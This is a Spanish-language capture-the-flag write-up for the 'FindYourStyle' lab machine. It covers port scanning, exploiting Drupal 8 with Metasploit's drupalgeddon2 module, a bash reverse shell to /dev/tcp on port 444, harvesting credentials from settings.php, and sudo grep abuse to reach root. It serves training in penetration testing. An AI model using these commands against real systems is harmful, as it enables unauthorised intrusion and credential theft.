> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-faciles/findyourstyle-write-up.md).

# FindYourStyle write-up

## **Verificamos conexión con la máquina víctima**

<figure><img src="/files/aYQnb1RxJGbch5jFzJAK" alt=""><figcaption></figcaption></figure>

## **Realizamos un escaneo de los puertos abiertos de la máquina víctima**

Utilizamos **nmap** para escanear los puertos abiertos en la máquina víctima con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -O -Pn -n 172.17.0.2
```

<figure><img src="/files/ieRuZB6DytjjGE60elK7" alt=""><figcaption></figcaption></figure>

El escaneo nos indica que el puerto 80 (HTTP) está abierto. Así que ingresamos la IP de la máquina víctima en el navegador y vemos lo siguiente:

<figure><img src="/files/97ZezRUVAREm7ci4IG2B" alt=""><figcaption></figcaption></figure>

Vemos que se está usando **Drupal**, así que vamos a usar **whatweb** para ver la versión que se está utilizando con el siguiente comando:

```bash
whatweb http://172.17.0.2/
```

<figure><img src="/files/dDMmdEN9Kh7C1KTPL3N7" alt=""><figcaption></figcaption></figure>

Esto nos indica que se está usando la versión de drupal 8, usaremos **Metasploit** para analizar si la versión es vulnerable. Iniciamos Metasploit con `msfconsole` y luego buscamos exploits con `search drupal 8`.

<figure><img src="/files/ZdORNLQvKaalNuVOuU0p" alt=""><figcaption></figcaption></figure>

Observamos que la versión es vulnerable, así que usaremos el script `exploit/unix/webapp/drupal_drupalgeddon2` escribiendo `use 0` y luego ejecutamos el comando `show options`, en cual nos indica que para que el script funcione tenemos que pasarle la IP de la máquina víctima. Así que ejecutamos lo sigiuente:

```bash
set RHOSTS 172.17.0.2
```

Ahora solo debemos ejecutar el comando `run` para lanzar el payload.

<figure><img src="/files/HWsilRMfeu4SZEK3sbOd" alt=""><figcaption></figcaption></figure>

La shell obtenida es limitada, por lo que ejecutamos `shell` y ponemos nuestra máquina en escucha con:

```bash
sudo nc -nlvvp 444
```

Ejecutamos el siguiente comando en la máquina víctima para obtener una shell interactiva:

```bash
bash -c "bash -i >& /dev/tcp/172.17.0.1/444 0>&1"
```

<figure><img src="/files/JdYeecBBbez8aZcCNpnw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/g7tHcFe7Eb3XC4NDdLYj" alt=""><figcaption></figcaption></figure>

Y ya estaríamos dentro de la máquina víctima.

## **Escalada de privilegios**

Una vez dentro de la máquina víctima vamos a irnos a la pagina web de hacktricks y a buscar drupal y nos encontramos la siguiente información:

<figure><img src="/files/NhdniV3ptb6G80tRcnCp" alt=""><figcaption></figcaption></figure>

Esto nos indica que existe un archivo llamado `settings.php` el cual podría tener datos sensibles, así que ejecutamos el siguiente comando para buscar la localización del archivo:

```bash
find / -name settings.php 2>/dev/null
```

<figure><img src="/files/hR14vLt99dyUrNttWUvQ" alt=""><figcaption></figcaption></figure>

Así que hacemos un cat del archivo y observamos lo siguiente:

```bash
cat /var/www/html/sites/default/settings.php
```

<figure><img src="/files/TrsrpugJPsRUi0PmnKdQ" alt=""><figcaption></figcaption></figure>

Y buscando nos encontramos las credenciales del usuario `ballenita`, el cual tiene como contraseña `ballenitafeliz`. Así que iniciamos sesión como el usuario `ballenita`.

```bash
su ballenita
```

<figure><img src="/files/E9vdWyQx7GRJIWYBDuLU" alt=""><figcaption></figcaption></figure>

Una vez iniciamos sesión como`ballenita`, ejecutamos el comando `sudo -l`, el cual nos indica que podemos ejecutar el binario `/bin/ls` y `/bin/grep`. Así que ejecutamos el siguiente comando para ver el contenido de la carpeta `/root`.

```bash
sudo /bin/ls /root
```

<figure><img src="/files/Bs1beX5S3H3yrCpUooBH" alt=""><figcaption></figcaption></figure>

Observamos que dentro de `/root` se encuentra el archivo `secretitomaximo.txt`, por lo que usamos `grep` para visualizar su contenido con el siguiente comando:

```bash
sudo /bin/grep "" /root/secretitomaximo.txt
```

<figure><img src="/files/60cdrEPqxjJ4qjNZMCEW" alt=""><figcaption></figcaption></figure>

Observamos que el archivo contiene la contraseña `nobodycanfindthispasswordrootrocks`, por lo que la usamos para iniciar sesión como root:

```bash
su
```

<figure><img src="/files/6LSCMyPoQjWGs6bOlrhf" alt=""><figcaption></figcaption></figure>

Y ya habríamos obtenido una shell con privilegios elevados.
